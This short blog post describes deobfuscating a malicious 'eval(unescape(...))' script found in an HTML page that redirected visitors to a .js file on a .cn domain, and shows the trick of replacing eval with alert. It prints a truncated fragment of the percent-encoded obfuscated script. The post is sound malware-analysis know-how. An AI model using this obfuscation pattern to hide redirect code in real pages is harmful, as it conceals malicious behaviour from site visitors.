Also known as “eval( unescape” decryption

Recently, @surbo was working an investigation where he came across some obfuscated code which was innocuously included in an otherwise un-threatening html file. He had noticed that the result of the code was to push the client to a .js file which was being hosted on a .cn domain. (that cant be good)

However when viewing the source of the html page, he was presented with a fairly common technique often called “Encrypting HTML” which really should be considered “Obfuscating HTML” because all that the programmer has done is converted “human readable” code into “Human-Unreadable, yet Browser-Readable” code. Below is a small extract of this obfuscated code.

<script>eval( unescape( "%6"+"9%6"+"6"+"%28%21%6"+"d%79%6"+"9%6"+"b%29%7b%0d%0a%76"+"%6"+"1%72%20%72%3d%6"+"4%6"+"f%6"+"3%75%6"+"d%6"+"5%6"+"e%74%2e%72%6"+"5%6"+"6"+"%6"+"5%72%72%6"+"5%72%2c%75%3d));

He needed to come up with a way to easily de-obfuscate this, and came up with something I feel very clever.. Re-write eval into alert and save it to a local file.

Re-Written:
<script>alert( unescape( "%6"+"9%6"+"6"+"%28%21%6"+"d%79%6"+"9%6"+"b%29%7b%0d%0a%76"+"%6"+"1%72%20%72%3d%6"+"4%6"+"f%6"+"3%75%6"+"d%6"+"5%6"+"e%74%2e%72%6"+"5%6"+"6"+"%6"+"5%72%72%6"+"5%72%2c%75%3d));

When loaded into a browser, the BROWSER to translate the obfuscated code into human readable form, and give it to you in a nice alert box allowing you to copy and paste!

Well, this is an easy way to do it by hand if you are ever in a pinch.. But if you are using firefox I suggest you should check out JavaScript Deobfuscator